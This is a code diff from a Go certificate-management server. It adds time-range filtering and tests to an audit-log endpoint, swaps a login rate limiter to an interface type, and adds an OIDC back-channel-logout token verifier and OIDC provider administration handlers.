ErrorWithRequestID(w, http.StatusInternalServerError, "Failed to list audit events", requestID)
|
ErrorWithRequestID(w, http.StatusInternalServerError, "Failed to list audit events", requestID)
|
||||||
return
|
return
|
||||||
|
|||||||
@@ -15,13 +15,18 @@ import (
|
|||||||
|
|
||||||
// mockAuditService implements AuditService for testing.
|
// mockAuditService implements AuditService for testing.
|
||||||
type mockAuditService struct {
|
type mockAuditService struct {
|
||||||
listFunc func(page, perPage int) ([]domain.AuditEvent, int64, error)
|
listFunc func(page, perPage int) ([]domain.AuditEvent, int64, error)
|
||||||
listByCatFunc func(category string, page, perPage int) ([]domain.AuditEvent, int64, error)
|
listByCatFunc func(category string, page, perPage int) ([]domain.AuditEvent, int64, error)
|
||||||
getFunc func(id string) (*domain.AuditEvent, error)
|
listByFiltFunc func(since, until time.Time, category string, page, perPage int) ([]domain.AuditEvent, int64, error)
|
||||||
|
getFunc func(id string) (*domain.AuditEvent, error)
|
||||||
// HIGH-11 self-audit trace — last RecordEventWithCategory call.
|
// HIGH-11 self-audit trace — last RecordEventWithCategory call.
|
||||||
lastAuditActor string
|
lastAuditActor string
|
||||||
lastAuditAction string
|
lastAuditAction string
|
||||||
lastAuditCategory string
|
lastAuditCategory string
|
||||||
|
// P-H2 trace — last ListAuditEventsByFilter args.
|
||||||
|
lastFilterSince time.Time
|
||||||
|
lastFilterUntil time.Time
|
||||||
|
lastFilterCategory string
|
||||||
}
|
}
|
||||||
|
|
||||||
func (m *mockAuditService) ListAuditEvents(_ context.Context, page, perPage int) ([]domain.AuditEvent, int64, error) {
|
func (m *mockAuditService) ListAuditEvents(_ context.Context, page, perPage int) ([]domain.AuditEvent, int64, error) {
|
||||||
@@ -41,6 +46,27 @@ func (m *mockAuditService) ListAuditEventsByCategory(_ context.Context, category
|
|||||||
return nil, 0, nil
|
return nil, 0, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// ListAuditEventsByFilter satisfies the P-H2 interface extension. The
|
||||||
|
// test fixture remembers the (since, until, category) tuple so
|
||||||
|
// per-subtest assertions can pin that the handler threaded the
|
||||||
|
// query-string params through correctly. Falls back to listFunc /
|
||||||
|
// listByCatFunc so existing tests don't need to set listByFiltFunc.
|
||||||
|
func (m *mockAuditService) ListAuditEventsByFilter(_ context.Context, since, until time.Time, category string, page, perPage int) ([]domain.AuditEvent, int64, error) {
|
||||||
|
m.lastFilterSince = since
|
||||||
|
m.lastFilterUntil = until
|
||||||
|
m.lastFilterCategory = category
|
||||||
|
if m.listByFiltFunc != nil {
|
||||||
|
return m.listByFiltFunc(since, until, category, page, perPage)
|
||||||
|
}
|
||||||
|
if category != "" && m.listByCatFunc != nil {
|
||||||
|
return m.listByCatFunc(category, page, perPage)
|
||||||
|
}
|
||||||
|
if m.listFunc != nil {
|
||||||
|
return m.listFunc(page, perPage)
|
||||||
|
}
|
||||||
|
return nil, 0, nil
|
||||||
|
}
|
||||||
|
|
||||||
func (m *mockAuditService) GetAuditEvent(_ context.Context, id string) (*domain.AuditEvent, error) {
|
func (m *mockAuditService) GetAuditEvent(_ context.Context, id string) (*domain.AuditEvent, error) {
|
||||||
if m.getFunc != nil {
|
if m.getFunc != nil {
|
||||||
return m.getFunc(id)
|
return m.getFunc(id)
|
||||||
@@ -325,6 +351,153 @@ func TestListAuditEvents_MethodNotAllowed(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// ── P-H2 closure (since / until time-range query params) ───────────
|
||||||
|
|
||||||
|
// TestListAuditEvents_WithSinceUntil pins the happy path — both bounds
|
||||||
|
// supplied in RFC3339, mock observes them threaded into the service
|
||||||
|
// call, response is 200.
|
||||||
|
func TestListAuditEvents_WithSinceUntil(t *testing.T) {
|
||||||
|
since := time.Date(2026, 4, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
until := time.Date(2026, 5, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
|
||||||
|
mockSvc := &mockAuditService{
|
||||||
|
listByFiltFunc: func(s, u time.Time, _ string, _, _ int) ([]domain.AuditEvent, int64, error) {
|
||||||
|
if !s.Equal(since) {
|
||||||
|
t.Errorf("service since = %v, want %v", s, since)
|
||||||
|
}
|
||||||
|
if !u.Equal(until) {
|
||||||
|
t.Errorf("service until = %v, want %v", u, until)
|
||||||
|
}
|
||||||
|
return []domain.AuditEvent{}, 0, nil
|
||||||
|
},
|
||||||
|
}
|
||||||
|
handler := NewAuditHandler(mockSvc)
|
||||||
|
|
||||||
|
url := "/api/v1/audit?since=" + since.Format(time.RFC3339) + "&until=" + until.Format(time.RFC3339)
|
||||||
|
req, err := http.NewRequest(http.MethodGet, url, nil)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("NewRequest failed: %v", err)
|
||||||
|
}
|
||||||
|
ctx := context.WithValue(req.Context(), middleware.RequestIDKey{}, "test-req-id")
|
||||||
|
req = req.WithContext(ctx)
|
||||||
|
|
||||||
|
w := httptest.NewRecorder()
|
||||||
|
handler.ListAuditEvents(w, req)
|
||||||
|
|
||||||
|
if w.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d, want 200; body=%s", w.Code, w.Body.String())
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterSince.Equal(since) {
|
||||||
|
t.Errorf("mock recorded since = %v, want %v", mockSvc.lastFilterSince, since)
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterUntil.Equal(until) {
|
||||||
|
t.Errorf("mock recorded until = %v, want %v", mockSvc.lastFilterUntil, until)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// TestListAuditEvents_SinceOnly pins one-sided bound — only `since`
|
||||||
|
// supplied, `until` stays zero. Closure of "operator filters to events
|
||||||
|
// from the last hour" via since=<now-1h>.
|
||||||
|
func TestListAuditEvents_SinceOnly(t *testing.T) {
|
||||||
|
since := time.Date(2026, 4, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
mockSvc := &mockAuditService{}
|
||||||
|
handler := NewAuditHandler(mockSvc)
|
||||||
|
|
||||||
|
req, _ := http.NewRequest(http.MethodGet, "/api/v1/audit?since="+since.Format(time.RFC3339), nil)
|
||||||
|
ctx := context.WithValue(req.Context(), middleware.RequestIDKey{}, "test-req-id")
|
||||||
|
req = req.WithContext(ctx)
|
||||||
|
|
||||||
|
w := httptest.NewRecorder()
|
||||||
|
handler.ListAuditEvents(w, req)
|
||||||
|
|
||||||
|
if w.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d, want 200; body=%s", w.Code, w.Body.String())
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterSince.Equal(since) {
|
||||||
|
t.Errorf("since = %v, want %v", mockSvc.lastFilterSince, since)
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterUntil.IsZero() {
|
||||||
|
t.Errorf("until = %v, want zero (open-ended)", mockSvc.lastFilterUntil)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// TestListAuditEvents_InvalidSince pins the parse-error 400 path.
|
||||||
|
// Silently dropping a malformed since would return ALL rows when the
|
||||||
|
// operator thought they were filtering — worse than rejecting.
|
||||||
|
func TestListAuditEvents_InvalidSince(t *testing.T) {
|
||||||
|
mockSvc := &mockAuditService{}
|
||||||
|
handler := NewAuditHandler(mockSvc)
|
||||||
|
|
||||||
|
req, _ := http.NewRequest(http.MethodGet, "/api/v1/audit?since=not-a-date", nil)
|
||||||
|
ctx := context.WithValue(req.Context(), middleware.RequestIDKey{}, "test-req-id")
|
||||||
|
req = req.WithContext(ctx)
|
||||||
|
|
||||||
|
w := httptest.NewRecorder()
|
||||||
|
handler.ListAuditEvents(w, req)
|
||||||
|
|
||||||
|
if w.Code != http.StatusBadRequest {
|
||||||
|
t.Errorf("status = %d, want 400; body=%s", w.Code, w.Body.String())
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterSince.IsZero() {
|
||||||
|
t.Error("service should NOT have been called on bad since")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// TestListAuditEvents_UntilBeforeSince pins the order assertion — a
|
||||||
|
// reversed range surfaces 400, doesn't quietly return empty.
|
||||||
|
func TestListAuditEvents_UntilBeforeSince(t *testing.T) {
|
||||||
|
since := time.Date(2026, 5, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
until := time.Date(2026, 4, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
|
||||||
|
mockSvc := &mockAuditService{}
|
||||||
|
handler := NewAuditHandler(mockSvc)
|
||||||
|
|
||||||
|
url := "/api/v1/audit?since=" + since.Format(time.RFC3339) + "&until=" + until.Format(time.RFC3339)
|
||||||
|
req, _ := http.NewRequest(http.MethodGet, url, nil)
|
||||||
|
ctx := context.WithValue(req.Context(), middleware.RequestIDKey{}, "test-req-id")
|
||||||
|
req = req.WithContext(ctx)
|
||||||
|
|
||||||
|
w := httptest.NewRecorder()
|
||||||
|
handler.ListAuditEvents(w, req)
|
||||||
|
|
||||||
|
if w.Code != http.StatusBadRequest {
|
||||||
|
t.Errorf("status = %d, want 400; body=%s", w.Code, w.Body.String())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// TestListAuditEvents_TimeRangePlusCategory pins that since/until
|
||||||
|
// compose with category (the auditor-role narrow-to-auth use case
|
||||||
|
// extended to "auth events from yesterday" without a separate
|
||||||
|
// endpoint).
|
||||||
|
func TestListAuditEvents_TimeRangePlusCategory(t *testing.T) {
|
||||||
|
since := time.Date(2026, 4, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
until := time.Date(2026, 5, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
|
||||||
|
mockSvc := &mockAuditService{}
|
||||||
|
handler := NewAuditHandler(mockSvc)
|
||||||
|
|
||||||
|
url := "/api/v1/audit?category=auth&since=" + since.Format(time.RFC3339) + "&until=" + until.Format(time.RFC3339)
|
||||||
|
req, _ := http.NewRequest(http.MethodGet, url, nil)
|
||||||
|
ctx := context.WithValue(req.Context(), middleware.RequestIDKey{}, "test-req-id")
|
||||||
|
req = req.WithContext(ctx)
|
||||||
|
|
||||||
|
w := httptest.NewRecorder()
|
||||||
|
handler.ListAuditEvents(w, req)
|
||||||
|
|
||||||
|
if w.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d, want 200; body=%s", w.Code, w.Body.String())
|
||||||
|
}
|
||||||
|
if mockSvc.lastFilterCategory != "auth" {
|
||||||
|
t.Errorf("category = %q, want auth", mockSvc.lastFilterCategory)
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterSince.Equal(since) {
|
||||||
|
t.Errorf("since = %v, want %v", mockSvc.lastFilterSince, since)
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterUntil.Equal(until) {
|
||||||
|
t.Errorf("until = %v, want %v", mockSvc.lastFilterUntil, until)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
func TestGetAuditEvent_Success(t *testing.T) {
|
func TestGetAuditEvent_Success(t *testing.T) {
|
||||||
event := &domain.AuditEvent{
|
event := &domain.AuditEvent{
|
||||||
ID: "ev-123",
|
ID: "ev-123",
|
||||||
|
|||||||
@@ -78,7 +78,7 @@ type AuthBreakglassHandler struct {
|
|||||||
// nil-safe: when unset, the handler skips the limiter check and
|
// nil-safe: when unset, the handler skips the limiter check and
|
||||||
// relies on the service-layer Argon2id lockout. Production deploys
|
// relies on the service-layer Argon2id lockout. Production deploys
|
||||||
// MUST set this via SetLoginRateLimiter.
|
// MUST set this via SetLoginRateLimiter.
|
||||||
loginLimiter *ratelimit.SlidingWindowLimiter
|
loginLimiter ratelimit.Limiter
|
||||||
}
|
}
|
||||||
|
|
||||||
// NewAuthBreakglassHandler constructs the handler.
|
// NewAuthBreakglassHandler constructs the handler.
|
||||||
@@ -89,7 +89,7 @@ func NewAuthBreakglassHandler(svc BreakglassService, cookieAttrs SessionCookieAt
|
|||||||
// SetLoginRateLimiter wires the per-source-IP rate limiter the Login
|
// SetLoginRateLimiter wires the per-source-IP rate limiter the Login
|
||||||
// handler enforces. Bundle 5 closure (S1) — see the AuthBreakglassHandler
|
// handler enforces. Bundle 5 closure (S1) — see the AuthBreakglassHandler
|
||||||
// type docstring for the full rationale.
|
// type docstring for the full rationale.
|
||||||
func (h *AuthBreakglassHandler) SetLoginRateLimiter(l *ratelimit.SlidingWindowLimiter) {
|
func (h *AuthBreakglassHandler) SetLoginRateLimiter(l ratelimit.Limiter) {
|
||||||
h.loginLimiter = l
|
h.loginLimiter = l
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,225 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package handler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"encoding/base64"
|
||||||
|
"encoding/json"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
gooidc "github.com/coreos/go-oidc/v3/oidc"
|
||||||
|
|
||||||
|
oidcdomain "github.com/certctl-io/certctl/internal/auth/oidc/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 11 (2026-05-14): extracted from
|
||||||
|
// internal/api/handler/auth_session_oidc.go via the Option B
|
||||||
|
// sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file holds the DefaultBCLVerifier — the default
|
||||||
|
// implementation of the BackChannelLogoutVerifier interface
|
||||||
|
// declared in auth_session_oidc.go. Verifies an OIDC
|
||||||
|
// back-channel-logout token per OpenID Connect Back-Channel
|
||||||
|
// Logout 1.0 §2.6: enforces the events claim, iat window,
|
||||||
|
// algorithm allowlist, audience match against the provider's
|
||||||
|
// configured client ID, and decodes sub/sid/jti for the
|
||||||
|
// revocation lookup.
|
||||||
|
//
|
||||||
|
// External callers:
|
||||||
|
// - cmd/server/main.go wires NewDefaultBCLVerifier(...) +
|
||||||
|
// DefaultBCLVerifierMaxAge into the AuthSessionOIDCHandler
|
||||||
|
// via WithBCLReplayConsumer.
|
||||||
|
//
|
||||||
|
// peekIssuer (unexported) is consumed only by Verify so it moves
|
||||||
|
// with the verifier. The go-oidc/v3 client is the underlying JWS
|
||||||
|
// verification + IdP-key-cache; everything else here is policy.
|
||||||
|
|
||||||
|
// =============================================================================
|
||||||
|
// Default BackChannelLogoutVerifier — wraps go-oidc/v3.
|
||||||
|
// =============================================================================
|
||||||
|
|
||||||
|
// DefaultBCLVerifierMaxAge is the default iat-freshness skew window
// (60 seconds). DefaultBCLVerifier.Verify rejects a logout token whose
// iat lies more than this far in the past or in the future, and falls
// back to this value when the configured max age is zero or negative.
// Override per-server via CERTCTL_OIDC_BCL_MAX_AGE_SECONDS. Audit
// 2026-05-10 HIGH-3 closure.
const DefaultBCLVerifierMaxAge = 60 * time.Second
|
||||||
|
|
||||||
|
// DefaultBCLVerifier is the production BackChannelLogoutVerifier. It
// resolves the IdP by issuer (matched against the OIDCProviderRepository),
// fetches the IdP's JWKS via gooidc.Provider, and validates the
// logout_token JWT signature + required claims.
type DefaultBCLVerifier struct {
	// providerRepo lists the configured providers; Verify matches the
	// token's issuer against each provider's IssuerURL.
	providerRepo repository.OIDCProviderRepository
	// tenantID is passed to providerRepo.List to scope the lookup.
	tenantID string
	// allowedAlgs is handed to go-oidc as SupportedSigningAlgs.
	allowedAlgs []string
	// maxAge is the iat-freshness skew window. Tokens with iat in the
	// past beyond this OR in the future beyond this are rejected. Set
	// via WithMaxAge; defaults to DefaultBCLVerifierMaxAge.
	maxAge time.Duration
	// nowFn is the clock seam (test injection).
	nowFn func() time.Time

	// Injectable for tests so unit tests don't hit a real IdP. When
	// non-nil it replaces provider discovery + signature verification.
	verifyOverride func(ctx context.Context, providerIssuer, rawIDToken string) (*gooidc.IDToken, error)
}
|
||||||
|
|
||||||
|
// NewDefaultBCLVerifier constructs a verifier wired against the given
|
||||||
|
// provider repo + tenant.
|
||||||
|
func NewDefaultBCLVerifier(providerRepo repository.OIDCProviderRepository, tenantID string, allowedAlgs []string) *DefaultBCLVerifier {
|
||||||
|
if len(allowedAlgs) == 0 {
|
||||||
|
allowedAlgs = []string{
|
||||||
|
gooidc.RS256, gooidc.RS512, gooidc.ES256, gooidc.ES384, gooidc.EdDSA,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return &DefaultBCLVerifier{
|
||||||
|
providerRepo: providerRepo,
|
||||||
|
tenantID: tenantID,
|
||||||
|
allowedAlgs: allowedAlgs,
|
||||||
|
maxAge: DefaultBCLVerifierMaxAge,
|
||||||
|
nowFn: time.Now,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// WithMaxAge overrides the iat-skew window and returns the verifier for
// call chaining. It mutates the receiver in place and returns that same
// pointer — it does NOT make a copy — so every holder of v observes the
// new window. Audit 2026-05-10 HIGH-3 — operator-configurable via
// CERTCTL_OIDC_BCL_MAX_AGE_SECONDS at cmd/server/main.go.
func (v *DefaultBCLVerifier) WithMaxAge(d time.Duration) *DefaultBCLVerifier {
	v.maxAge = d
	return v
}
|
||||||
|
|
||||||
|
// Verify implements BackChannelLogoutVerifier.
|
||||||
|
func (v *DefaultBCLVerifier) Verify(ctx context.Context, logoutToken string) (issuer, sub, sid, jti string, iat int64, err error) {
|
||||||
|
// We don't know which provider the logout_token came from until we
|
||||||
|
// peek at the iss claim. Parse-without-verify, look up the matching
|
||||||
|
// provider, then verify against that provider's JWKS.
|
||||||
|
iss, peekErr := peekIssuer(logoutToken)
|
||||||
|
if peekErr != nil {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("peek issuer: %w", peekErr)
|
||||||
|
}
|
||||||
|
provs, lerr := v.providerRepo.List(ctx, v.tenantID)
|
||||||
|
if lerr != nil {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("list providers: %w", lerr)
|
||||||
|
}
|
||||||
|
var matched *oidcdomain.OIDCProvider
|
||||||
|
for _, p := range provs {
|
||||||
|
if p.IssuerURL == iss {
|
||||||
|
matched = p
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if matched == nil {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("no provider configured for issuer %q", iss)
|
||||||
|
}
|
||||||
|
|
||||||
|
var idToken *gooidc.IDToken
|
||||||
|
if v.verifyOverride != nil {
|
||||||
|
idToken, err = v.verifyOverride(ctx, matched.IssuerURL, logoutToken)
|
||||||
|
} else {
|
||||||
|
provider, perr := gooidc.NewProvider(ctx, matched.IssuerURL)
|
||||||
|
if perr != nil {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("provider discovery: %w", perr)
|
||||||
|
}
|
||||||
|
verifier := provider.Verifier(&gooidc.Config{
|
||||||
|
ClientID: matched.ClientID,
|
||||||
|
SupportedSigningAlgs: v.allowedAlgs,
|
||||||
|
SkipExpiryCheck: true, // OIDC BCL §2.4 — no exp claim required
|
||||||
|
})
|
||||||
|
idToken, err = verifier.Verify(ctx, logoutToken)
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("verify: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Required claims per spec §2.4.
|
||||||
|
var claims struct {
|
||||||
|
Iss string `json:"iss"`
|
||||||
|
Aud interface{} `json:"aud"`
|
||||||
|
Iat int64 `json:"iat"`
|
||||||
|
Jti string `json:"jti"`
|
||||||
|
Events map[string]interface{} `json:"events"`
|
||||||
|
Sub string `json:"sub"`
|
||||||
|
Sid string `json:"sid"`
|
||||||
|
Nonce string `json:"nonce"`
|
||||||
|
}
|
||||||
|
if cerr := idToken.Claims(&claims); cerr != nil {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("claims unmarshal: %w", cerr)
|
||||||
|
}
|
||||||
|
if claims.Iat == 0 {
|
||||||
|
return "", "", "", "", 0, errors.New("missing iat claim")
|
||||||
|
}
|
||||||
|
// Audit 2026-05-10 HIGH-3 — iat freshness check. Reject tokens
|
||||||
|
// whose iat is outside the skew window. RFC 9700 §2.7 + the
|
||||||
|
// existing ID-token-path skew tolerance (oidc/service.go:463).
|
||||||
|
maxAge := v.maxAge
|
||||||
|
if maxAge <= 0 {
|
||||||
|
maxAge = DefaultBCLVerifierMaxAge
|
||||||
|
}
|
||||||
|
now := v.nowFn().UTC()
|
||||||
|
iatTime := time.Unix(claims.Iat, 0).UTC()
|
||||||
|
if iatTime.After(now.Add(maxAge)) {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("iat is in the future beyond max-age %s", maxAge)
|
||||||
|
}
|
||||||
|
if now.Sub(iatTime) > maxAge {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("iat is stale (age %s > max-age %s)", now.Sub(iatTime), maxAge)
|
||||||
|
}
|
||||||
|
if claims.Jti == "" {
|
||||||
|
return "", "", "", "", 0, errors.New("missing jti claim")
|
||||||
|
}
|
||||||
|
if claims.Events == nil {
|
||||||
|
return "", "", "", "", 0, errors.New("missing events claim")
|
||||||
|
}
|
||||||
|
if _, ok := claims.Events["http://schemas.openid.net/event/backchannel-logout"]; !ok {
|
||||||
|
return "", "", "", "", 0, errors.New("events claim missing back-channel-logout URI")
|
||||||
|
}
|
||||||
|
if claims.Nonce != "" {
|
||||||
|
// Spec §2.4: nonce MUST NOT be present.
|
||||||
|
return "", "", "", "", 0, errors.New("nonce claim must be absent in logout_token")
|
||||||
|
}
|
||||||
|
if claims.Sub == "" && claims.Sid == "" {
|
||||||
|
return "", "", "", "", 0, errors.New("logout_token must carry sub or sid")
|
||||||
|
}
|
||||||
|
return claims.Iss, claims.Sub, claims.Sid, claims.Jti, claims.Iat, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// peekIssuer returns the `iss` claim of a compact JWT WITHOUT verifying
// its signature. It base64url-decodes the payload (the middle of the
// three dot-separated segments) and reads only the issuer from it, so
// the caller can find the matching provider before it knows which JWKS
// to verify against.
//
// Audit 2026-05-10 Nit-3 — peekIssuer is INTENTIONALLY unsigned-permissive.
// Its result is suitable ONLY for selecting a verifier; signature and
// claim verification happen afterwards in DefaultBCLVerifier.Verify.
// Callers MUST NOT base any access-control decision on this value before
// that verification completes (peek → match provider →
// verify-against-provider → consume).
//
// It returns an error when the token does not have exactly three
// segments, when the payload is not valid unpadded base64url or valid
// JSON, or when the iss claim is missing or empty.
func peekIssuer(jwt string) (string, error) {
	segments := strings.Split(jwt, ".")
	if len(segments) != 3 {
		return "", errors.New("expected 3 JWT segments")
	}

	raw, decodeErr := base64.RawURLEncoding.DecodeString(segments[1])
	if decodeErr != nil {
		return "", fmt.Errorf("payload base64: %w", decodeErr)
	}

	// Only iss matters here; the decoder ignores every other claim.
	claims := struct {
		Iss string `json:"iss"`
	}{}
	if parseErr := json.Unmarshal(raw, &claims); parseErr != nil {
		return "", fmt.Errorf("payload json: %w", parseErr)
	}

	switch issuer := claims.Iss; issuer {
	case "":
		return "", errors.New("missing iss claim in payload")
	default:
		return issuer, nil
	}
}
|
||||||
@@ -0,0 +1,469 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package handler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"encoding/json"
|
||||||
|
"errors"
|
||||||
|
"net/http"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
oidcsvc "github.com/certctl-io/certctl/internal/auth/oidc"
|
||||||
|
oidcdomain "github.com/certctl-io/certctl/internal/auth/oidc/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 11 (2026-05-14): extracted from
|
||||||
|
// internal/api/handler/auth_session_oidc.go via the Option B
|
||||||
|
// sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file holds Section 3 of the original three-section layout:
|
||||||
|
// OIDC PROVIDER + GROUP-MAPPING CRUD (RBAC-gated). Nine
|
||||||
|
// endpoints across two related resources:
|
||||||
|
//
|
||||||
|
// GET /api/v1/auth/oidc/providers -> auth.oidc.list
|
||||||
|
// POST /api/v1/auth/oidc/providers -> auth.oidc.create
|
||||||
|
// PUT /api/v1/auth/oidc/providers/{id} -> auth.oidc.edit
|
||||||
|
// DELETE /api/v1/auth/oidc/providers/{id} -> auth.oidc.delete
|
||||||
|
// POST /api/v1/auth/oidc/providers/{id}/test -> auth.oidc.edit
|
||||||
|
// POST /api/v1/auth/oidc/providers/{id}/refresh -> auth.oidc.edit
|
||||||
|
// GET /api/v1/auth/oidc/group-mappings -> auth.oidc.list
|
||||||
|
// POST /api/v1/auth/oidc/group-mappings -> auth.oidc.edit
|
||||||
|
// DELETE /api/v1/auth/oidc/group-mappings/{id} -> auth.oidc.edit
|
||||||
|
//
|
||||||
|
// The four request/response projection types (oidcProviderRequest,
|
||||||
|
// oidcProviderResponse, groupMappingRequest, groupMappingResponse)
|
||||||
|
// move with their handler callers. The encryptClientSecret +
|
||||||
|
// recordAudit + randomB64URLForHandler + defaultIfBlank +
|
||||||
|
// defaultIntIfZero helpers stay in auth_session_oidc.go — they're
|
||||||
|
// also consumed elsewhere (recordAudit is used by every section)
|
||||||
|
// or are generic utilities that don't have a single owner.
|
||||||
|
//
|
||||||
|
// NOTE: the audit's verb-based prescription (login / callback /
|
||||||
|
// refresh / logout / backchannel) named "refresh" as a separate
|
||||||
|
// sibling file. The RefreshProvider handler here is the only
|
||||||
|
// "refresh" in this file, but operationally it's an ADMIN
|
||||||
|
// operation on a provider's signing-key cache, not a session
|
||||||
|
// refresh. Sprint 11 keeps it grouped with the rest of the
|
||||||
|
// provider CRUD where it belongs by call-graph + permission scope
|
||||||
|
// (auth.oidc.edit, the same RBAC permission as Update/Delete).
|
||||||
|
|
||||||
|
// =============================================================================
|
||||||
|
// 3. OIDC provider + group-mapping CRUD.
|
||||||
|
// =============================================================================
|
||||||
|
|
||||||
|
// oidcProviderResponse is the JSON projection of an OIDC provider
// written by the provider endpoints. It has no client-secret field, so
// the secret is never echoed back. The timestamps are strings that
// providerToResponse formats as RFC 3339 in UTC.
type oidcProviderResponse struct {
	ID                  string   `json:"id"`
	TenantID            string   `json:"tenant_id"`
	Name                string   `json:"name"`
	IssuerURL           string   `json:"issuer_url"`
	ClientID            string   `json:"client_id"`
	RedirectURI         string   `json:"redirect_uri"`
	GroupsClaimPath     string   `json:"groups_claim_path"`
	GroupsClaimFormat   string   `json:"groups_claim_format"`
	FetchUserinfo       bool     `json:"fetch_userinfo"`
	Scopes              []string `json:"scopes"`
	AllowedEmailDomains []string `json:"allowed_email_domains"`
	IATWindowSeconds    int      `json:"iat_window_seconds"`
	JWKSCacheTTLSeconds int      `json:"jwks_cache_ttl_seconds"`
	CreatedAt           string   `json:"created_at"`
	UpdatedAt           string   `json:"updated_at"`
}
|
||||||
|
|
||||||
|
func providerToResponse(p *oidcdomain.OIDCProvider) oidcProviderResponse {
|
||||||
|
return oidcProviderResponse{
|
||||||
|
ID: p.ID, TenantID: p.TenantID, Name: p.Name,
|
||||||
|
IssuerURL: p.IssuerURL, ClientID: p.ClientID, RedirectURI: p.RedirectURI,
|
||||||
|
GroupsClaimPath: p.GroupsClaimPath, GroupsClaimFormat: p.GroupsClaimFormat,
|
||||||
|
FetchUserinfo: p.FetchUserinfo, Scopes: p.Scopes, AllowedEmailDomains: p.AllowedEmailDomains,
|
||||||
|
IATWindowSeconds: p.IATWindowSeconds, JWKSCacheTTLSeconds: p.JWKSCacheTTLSeconds,
|
||||||
|
CreatedAt: p.CreatedAt.UTC().Format(time.RFC3339),
|
||||||
|
UpdatedAt: p.UpdatedAt.UTC().Format(time.RFC3339),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// oidcProviderRequest is the JSON body accepted by CreateProvider and
// UpdateProvider. CreateProvider rejects a blank ClientSecret;
// UpdateProvider treats a blank one as "keep the stored ciphertext".
type oidcProviderRequest struct {
	Name                string   `json:"name"`
	IssuerURL           string   `json:"issuer_url"`
	ClientID            string   `json:"client_id"`
	ClientSecret        string   `json:"client_secret"` // plaintext on the wire ONLY at create/update; encrypted at rest
	RedirectURI         string   `json:"redirect_uri"`
	GroupsClaimPath     string   `json:"groups_claim_path"`
	GroupsClaimFormat   string   `json:"groups_claim_format"`
	FetchUserinfo       bool     `json:"fetch_userinfo"`
	Scopes              []string `json:"scopes"`
	AllowedEmailDomains []string `json:"allowed_email_domains"`
	IATWindowSeconds    int      `json:"iat_window_seconds"`
	JWKSCacheTTLSeconds int      `json:"jwks_cache_ttl_seconds"`
}
|
||||||
|
|
||||||
|
// ListProviders handles GET /api/v1/auth/oidc/providers.
|
||||||
|
func (h *AuthSessionOIDCHandler) ListProviders(w http.ResponseWriter, r *http.Request) {
|
||||||
|
if _, err := callerFromRequest(r); err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
provs, err := h.providerRepo.List(r.Context(), h.tenantID)
|
||||||
|
if err != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not list providers")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
out := make([]oidcProviderResponse, 0, len(provs))
|
||||||
|
for _, p := range provs {
|
||||||
|
out = append(out, providerToResponse(p))
|
||||||
|
}
|
||||||
|
writeJSON(w, http.StatusOK, map[string]interface{}{"providers": out})
|
||||||
|
}
|
||||||
|
|
||||||
|
